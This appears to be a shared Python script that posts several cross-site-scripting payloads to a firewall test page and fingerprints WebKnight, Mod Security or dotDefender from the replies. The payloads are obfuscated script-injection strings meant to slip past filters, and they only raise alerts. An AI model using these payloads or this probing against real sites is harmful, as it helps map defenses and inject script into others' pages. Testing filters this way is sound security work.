Viru5hax

RAW Code

Jan 6th, 2017
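# Author : Asif Nawaz
# Blog : http://viru5hax.blogspot.com/
# Date : 6/1/2017
#
# Submits sample markup strings to the 'waf' form of a WAF test page and
# searches each reply for product names, to guess which web application
# firewall (if any) produced the reply.
#
# The original used Python 2 print statements; print(...) with a single
# argument prints the same text there, so the output format is unchanged.
import mechanize as mec

TARGET_URL = "http://check.cyberpersons.com/crossSiteCheck.html"
FORM_NAME = 'waf'
FIELD_NAME = 'data'
SEPARATOR = "---------------------------------------------------"

# (substring searched for in the response body, message printed on a match).
# The original chain tested 'Mod_Security' twice; the second test could never
# be reached, so it is listed once here.
FIREWALL_SIGNATURES = (
    ('WebKnight', "Firewall detected: WebKnight"),
    ('Mod_Security', "Firewall detected: Mod Security"),
    ('dotDefender', "Firewall detected: Dot Defender"),
)


def submit_payload(payload):
    """Post *payload* in the test form and return the response body.

    A fresh Browser is used for every request, as in the original script,
    so no cookies or history carry over between probes.

    mechanize raises HTTPError when the server answers with an error status.
    A filtering product commonly answers a rejected request that way, and the
    text worth inspecting is then the body of the error itself, so that body
    is returned instead of letting the exception end the run.
    """
    browser = mec.Browser()
    browser.open(TARGET_URL)
    browser.select_form(FORM_NAME)
    browser.form[FIELD_NAME] = payload
    try:
        browser.submit()
    except mec.HTTPError as blocked:
        return blocked.read()
    return browser.response().read()


def report_firewall(response):
    """Print which known product name, if any, appears in *response*.

    This is a plain substring match on the body, so it only recognises
    products whose block page names them. A customised block page, or a
    filter that silently strips input, produces no match; the fallback
    message therefore reports "no known signature" rather than claiming
    that no firewall is present.
    """
    for marker, message in FIREWALL_SIGNATURES:
        if marker in response:
            print(message)
            return
    print("No known firewall signature in response")


# First probe: show the raw reply, then the fingerprint result.
response = submit_payload("<svg><script>alert&grave;1&grave;<p>")
print(response)
report_firewall(response)


# Second round: only the fingerprint result is printed for each string.
listofPayloads = ['<dialog open="" onclose="alert(1)"><form method="dialog"><button>Close me!</button></form></dialog>', '<svg><script>prompt&#40 1&#41<i>', '<a href="&#1;javascript:alert(1)">CLICK ME<a>']

for payLoads in listofPayloads:
    response = submit_payload(payLoads)
    print(SEPARATOR)
    report_firewall(response)
    print(SEPARATOR)


# Third round: three spellings of the same harmless <b> tag, with the raw
# reply printed so the handling of each spelling can be compared by eye.
# NOTE: in a Python 2 byte-string literal '\u003c' is not an escape and is
# sent as those six characters, whereas '\x3c' is decoded by Python itself,
# so the last entry reaches the server as a plain '<b>' and does not test
# how an encoded form is handled.
listofPayloads = ['&lt;b&gt;','\u003cb\u003e','\x3cb\x3e']

for payLoads in listofPayloads:
    response = submit_payload(payLoads)
    print(SEPARATOR)
    print(response)
    print(SEPARATOR)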